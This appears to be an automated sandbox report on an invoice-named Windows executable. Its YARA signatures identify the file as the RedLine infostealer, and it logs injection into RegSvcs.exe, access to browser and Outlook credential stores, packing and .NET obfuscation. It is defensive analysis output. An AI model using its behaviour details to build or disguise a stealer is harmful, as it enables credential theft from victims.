                    Source: C:\Users\user\Desktop\Factura adjunta.exeCode function: 0_2_007B1290 NtdllDialogWndProc_W,GetClientRect,GetCursorPos,ScreenToClient,0_2_007B1290
                    Source: C:\Users\user\Desktop\Factura adjunta.exeCode function: 0_2_007B1287 NtdllDialogWndProc_W,GetSysColor,SetBkColor,74A3C8D0,NtdllDialogWndProc_W,0_2_007B1287
                    Source: C:\Users\user\Desktop\Factura adjunta.exeCode function: 0_2_007B167D NtdllDialogWndProc_W,0_2_007B167D
                    Source: C:\Users\user\Desktop\Factura adjunta.exeCode function: 0_2_0083D6C6 NtdllDialogWndProc_W,0_2_0083D6C6
                    Source: C:\Users\user\Desktop\Factura adjunta.exeCode function: 0_2_007B16DE GetParent,NtdllDialogWndProc_W,0_2_007B16DE
                    Source: C:\Users\user\Desktop\Factura adjunta.exeCode function: 0_2_007B16B5 NtdllDialogWndProc_W,0_2_007B16B5
                    Source: C:\Users\user\Desktop\Factura adjunta.exeCode function: 0_2_0083D74C GetSystemMetrics,GetSystemMetrics,MoveWindow,SendMessageW,SendMessageW,ShowWindow,InvalidateRect,NtdllDialogWndProc_W,0_2_0083D74C
                    Source: C:\Users\user\Desktop\Factura adjunta.exeCode function: 0_2_007B189B NtdllDialogWndProc_W,0_2_007B189B
                    Source: C:\Users\user\Desktop\Factura adjunta.exeCode function: 0_2_0083DA9A NtdllDialogWndProc_W,0_2_0083DA9A
                    Source: C:\Users\user\Desktop\Factura adjunta.exeCode function: 0_2_0083BF4D NtdllDialogWndProc_W,CallWindowProcW,0_2_0083BF4D
                    Source: C:\Users\user\Desktop\Factura adjunta.exeCode function: 0_2_008140B1: CreateFileW,_memset,DeviceIoControl,CloseHandle,0_2_008140B1
                    Source: C:\Users\user\Desktop\Factura adjunta.exeCode function: 0_2_00808858 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,74BF5590,CreateProcessAsUserW,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,0_2_00808858
                    Source: C:\Users\user\Desktop\Factura adjunta.exeCode function: 0_2_0081545F ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_0081545F
                    Source: C:\Users\user\Desktop\Factura adjunta.exeCode function: 0_2_007BE8000_2_007BE800
                    Source: C:\Users\user\Desktop\Factura adjunta.exeCode function: 0_2_007DDBB50_2_007DDBB5
                    Source: C:\Users\user\Desktop\Factura adjunta.exeCode function: 0_2_007BE0600_2_007BE060
                    Source: C:\Users\user\Desktop\Factura adjunta.exeCode function: 0_2_0083804A0_2_0083804A
                    Source: C:\Users\user\Desktop\Factura adjunta.exeCode function: 0_2_007C41400_2_007C4140
                    Source: C:\Users\user\Desktop\Factura adjunta.exeCode function: 0_2_007D24050_2_007D2405
                    Source: C:\Users\user\Desktop\Factura adjunta.exeCode function: 0_2_007E65220_2_007E6522
                    Source: C:\Users\user\Desktop\Factura adjunta.exeCode function: 0_2_007E267E0_2_007E267E
                    Source: C:\Users\user\Desktop\Factura adjunta.exeCode function: 0_2_008306650_2_00830665
                    Source: C:\Users\user\Desktop\Factura adjunta.exeCode function: 0_2_007C68430_2_007C6843
                    Source: C:\Users\user\Desktop\Factura adjunta.exeCode function: 0_2_007D283A0_2_007D283A
                    Source: C:\Users\user\Desktop\Factura adjunta.exeCode function: 0_2_007E89DF0_2_007E89DF
                    Source: C:\Users\user\Desktop\Factura adjunta.exeCode function: 0_2_00830AE20_2_00830AE2
                    Source: C:\Users\user\Desktop\Factura adjunta.exeCode function: 0_2_007C8A0E0_2_007C8A0E
                    Source: C:\Users\user\Desktop\Factura adjunta.exeCode function: 0_2_007E6A940_2_007E6A94
                    Source: C:\Users\user\Desktop\Factura adjunta.exeCode function: 0_2_0080EB070_2_0080EB07
                    Source: C:\Users\user\Desktop\Factura adjunta.exeCode function: 0_2_00818B130_2_00818B13
                    Source: C:\Users\user\Desktop\Factura adjunta.exeCode function: 0_2_007DCD610_2_007DCD61
                    Source: C:\Users\user\Desktop\Factura adjunta.exeCode function: 0_2_007E70060_2_007E7006
                    Source: C:\Users\user\Desktop\Factura adjunta.exeCode function: 0_2_007C710E0_2_007C710E
                    Source: C:\Users\user\Desktop\Factura adjunta.exeCode function: 0_2_007C31900_2_007C3190
                    Source: C:\Users\user\Desktop\Factura adjunta.exeCode function: 0_2_007B12870_2_007B1287
                    Source: C:\Users\user\Desktop\Factura adjunta.exeCode function: 0_2_007D33C70_2_007D33C7
                    Source: C:\Users\user\Desktop\Factura adjunta.exeCode function: 0_2_007DF4190_2_007DF419
                    Source: C:\Users\user\Desktop\Factura adjunta.exeCode function: 0_2_007D16C40_2_007D16C4
                    Source: C:\Users\user\Desktop\Factura adjunta.exeCode function: 0_2_007C56800_2_007C5680
                    Source: C:\Users\user\Desktop\Factura adjunta.exeCode function: 0_2_007D78D30_2_007D78D3
                    Source: C:\Users\user\Desktop\Factura adjunta.exeCode function: 0_2_007C58C00_2_007C58C0
                    Source: C:\Users\user\Desktop\Factura adjunta.exeCode function: 0_2_007D1BB80_2_007D1BB8
                    Source: C:\Users\user\Desktop\Factura adjunta.exeCode function: 0_2_007E9D050_2_007E9D05
                    Source: C:\Users\user\Desktop\Factura adjunta.exeCode function: 0_2_007BFE400_2_007BFE40
                    Source: C:\Users\user\Desktop\Factura adjunta.exeCode function: 0_2_007DBFE60_2_007DBFE6
                    Source: C:\Users\user\Desktop\Factura adjunta.exeCode function: 0_2_007D1FD00_2_007D1FD0
                    Source: C:\Users\user\Desktop\Factura adjunta.exeCode function: 0_2_007636000_2_00763600
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00408C602_2_00408C60
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0040DC112_2_0040DC11
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00407C3F2_2_00407C3F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00418CCC2_2_00418CCC
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00406CA02_2_00406CA0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004028B02_2_004028B0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0041A4BE2_2_0041A4BE
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004182442_2_00418244
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004016502_2_00401650
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00402F202_2_00402F20
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004193C42_2_004193C4
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004187882_2_00418788
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00402F892_2_00402F89
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00402B902_2_00402B90
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004073A02_2_004073A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0292CE102_2_0292CE10
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0292DA282_2_0292DA28
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_029212982_2_02921298
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_029210302_2_02921030
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0292D1582_2_0292D158
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_068257C82_2_068257C8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0682D3602_2_0682D360
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0682AA892_2_0682AA89
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0682DA9C2_2_0682DA9C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_06826B682_2_06826B68
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_068209F02_2_068209F0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0682E4DB2_2_0682E4DB
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_06828D702_2_06828D70
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_06821AE02_2_06821AE0
                    Source: C:\Users\user\Desktop\Factura adjunta.exeCode function: String function: 007D8B40 appears 42 times
                    Source: C:\Users\user\Desktop\Factura adjunta.exeCode function: String function: 007D0D27 appears 70 times
                    Source: C:\Users\user\Desktop\Factura adjunta.exeCode function: String function: 007B7F41 appears 35 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 0040E1D8 appears 44 times
                    Source: Factura adjunta.exe, 00000000.00000003.2190852276.00000000036ED000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Factura adjunta.exe
                    Source: Factura adjunta.exe, 00000000.00000003.2189048996.00000000034F3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Factura adjunta.exe
                    Source: Factura adjunta.exe, 00000000.00000002.2199198462.0000000000E20000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename7f0ec740-a7b3-40d7-8bc3-c6ab55be2f58.exe4 vs Factura adjunta.exe
                    Source: Factura adjunta.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                    Source: 2.2.RegSvcs.exe.2b1f4a6.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.Factura adjunta.exe.e20000.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 2.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 2.2.RegSvcs.exe.3ef5570.6.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 2.2.RegSvcs.exe.2e70ee8.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 2.2.RegSvcs.exe.3ef6458.7.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 2.2.RegSvcs.exe.2e70ee8.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 2.2.RegSvcs.exe.2b2038e.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 2.2.RegSvcs.exe.3f43f90.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 2.2.RegSvcs.exe.5270000.8.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 2.2.RegSvcs.exe.3ef6458.7.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 2.2.RegSvcs.exe.2b1f4a6.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 2.2.RegSvcs.exe.2e70000.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 2.2.RegSvcs.exe.5270000.8.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 2.2.RegSvcs.exe.2b2038e.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 2.2.RegSvcs.exe.3f43f90.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 2.2.RegSvcs.exe.2e70000.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 2.2.RegSvcs.exe.3ef5570.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 00000002.00000002.4638677256.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 00000002.00000002.4642126380.0000000005270000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 00000000.00000002.2199198462.0000000000E20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 00000002.00000002.4640161809.0000000002E70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 2.2.RegSvcs.exe.3ef6458.7.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                    Source: 2.2.RegSvcs.exe.3ef6458.7.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                    Source: 2.2.RegSvcs.exe.2b2038e.2.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                    Source: 2.2.RegSvcs.exe.2b2038e.2.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                    Source: 2.2.RegSvcs.exe.3f43f90.5.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                    Source: 2.2.RegSvcs.exe.3f43f90.5.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                    Source: 2.2.RegSvcs.exe.2e70ee8.4.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                    Source: 2.2.RegSvcs.exe.2e70ee8.4.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                    Source: 2.2.RegSvcs.exe.5270000.8.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                    Source: 2.2.RegSvcs.exe.5270000.8.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                    Source: 2.2.RegSvcs.exe.5270000.8.raw.unpack, 4JJG6X.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 2.2.RegSvcs.exe.5270000.8.raw.unpack, 4JJG6X.csCryptographic APIs: 'TransformFinalBlock'
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/4@3/3
                    Source: C:\Users\user\Desktop\Factura adjunta.exeCode function: 0_2_0081A2D5 GetLastError,FormatMessageW,0_2_0081A2D5
                    Source: C:\Users\user\Desktop\Factura adjunta.exeCode function: 0_2_00808713 AdjustTokenPrivileges,CloseHandle,0_2_00808713
                    Source: C:\Users\user\Desktop\Factura adjunta.exeCode function: 0_2_00808CC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_00808CC3
                    Source: C:\Users\user\Desktop\Factura adjunta.exeCode function: 0_2_0081B59E SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_0081B59E
                    Source: C:\Users\user\Desktop\Factura adjunta.exeCode function: 0_2_0082F121 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_0082F121
                    Source: C:\Users\user\Desktop\Factura adjunta.exeCode function: 0_2_007B4FE9 FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_007B4FE9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: NULL
                    Source: C:\Users\user\Desktop\Factura adjunta.exeFile created: C:\Users\user\AppData\Local\Temp\aut663B.tmpJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                    Source: C:\Users\user\Desktop\Factura adjunta.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: Factura adjunta.exeReversingLabs: Detection: 63%
                    Source: unknownProcess created: C:\Users\user\Desktop\Factura adjunta.exe "C:\Users\user\Desktop\Factura adjunta.exe"
                    Source: C:\Users\user\Desktop\Factura adjunta.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\Factura adjunta.exe"
                    Source: C:\Users\user\Desktop\Factura adjunta.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\Factura adjunta.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\Factura adjunta.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Factura adjunta.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\Desktop\Factura adjunta.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\Factura adjunta.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\Factura adjunta.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\Factura adjunta.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\Desktop\Factura adjunta.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\Desktop\Factura adjunta.exeSection loaded: wsock32.dllJump to behavior
                    Source: C:\Users\user\Desktop\Factura adjunta.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\Factura adjunta.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\Factura adjunta.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                    Source: Binary string: _.pdb source: RegSvcs.exe, 00000002.00000002.4639975848.0000000002ADF000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4641648764.0000000003EF1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4640161809.0000000002E70000.00000004.08000000.00040000.00000000.sdmp
                    Source: Binary string: wntdll.pdbUGP source: Factura adjunta.exe, 00000000.00000003.2189209152.0000000003570000.00000004.00001000.00020000.00000000.sdmp, Factura adjunta.exe, 00000000.00000003.2189483063.00000000033D0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: wntdll.pdb source: Factura adjunta.exe, 00000000.00000003.2189209152.0000000003570000.00000004.00001000.00020000.00000000.sdmp, Factura adjunta.exe, 00000000.00000003.2189483063.00000000033D0000.00000004.00001000.00020000.00000000.sdmp

                    Data Obfuscation

                    barindex
                    .NET source code contains method to dynamically call methods (often used by packers)
                    Source: 2.2.RegSvcs.exe.3ef6458.7.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                    Source: 2.2.RegSvcs.exe.2b2038e.2.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                    Source: 2.2.RegSvcs.exe.3f43f90.5.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                    Source: 2.2.RegSvcs.exe.2e70ee8.4.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                    Source: 2.2.RegSvcs.exe.5270000.8.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                    Source: C:\Users\user\Desktop\Factura adjunta.exeCode function: 0_2_008D7080 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,0_2_008D7080
                    Source: C:\Users\user\Desktop\Factura adjunta.exeCode function: 0_2_007BC590 push eax; retn 007Bh0_2_007BC599
                    Source: C:\Users\user\Desktop\Factura adjunta.exeCode function: 0_2_007D8B85 push ecx; ret 0_2_007D8B98
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0041C40C push cs; iretd 2_2_0041C4E2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00423149 push eax; ret 2_2_00423179
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0041C50E push cs; iretd 2_2_0041C4E2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004231C8 push eax; ret 2_2_00423179
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0040E21D push ecx; ret 2_2_0040E230
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0041C6BE push ebx; ret 2_2_0041C6BF
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0292435A push ebp; iretd 2_2_02924360
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0682D93B push esp; ret 2_2_0682D941
                    Source: 2.2.RegSvcs.exe.3ef6458.7.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'fghgZOUGM7pEu', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
                    Source: 2.2.RegSvcs.exe.2b2038e.2.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'fghgZOUGM7pEu', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
                    Source: 2.2.RegSvcs.exe.3f43f90.5.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'fghgZOUGM7pEu', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
                    Source: 2.2.RegSvcs.exe.2e70ee8.4.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'fghgZOUGM7pEu', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
                    Source: 2.2.RegSvcs.exe.5270000.8.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'fghgZOUGM7pEu', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
                    Source: initial sampleStatic PE information: section name: UPX0
                    Source: initial sampleStatic PE information: section name: UPX1
                    Source: C:\Users\user\Desktop\Factura adjunta.exeCode function: 0_2_007B4A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_007B4A35
                    Source: C:\Users\user\Desktop\Factura adjunta.exeCode function: 0_2_008355FD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_008355FD
                    Source: C:\Users\user\Desktop\Factura adjunta.exeCode function: 0_2_007D33C7 RtlEncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_007D33C7
                    Source: C:\Users\user\Desktop\Factura adjunta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Factura adjunta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
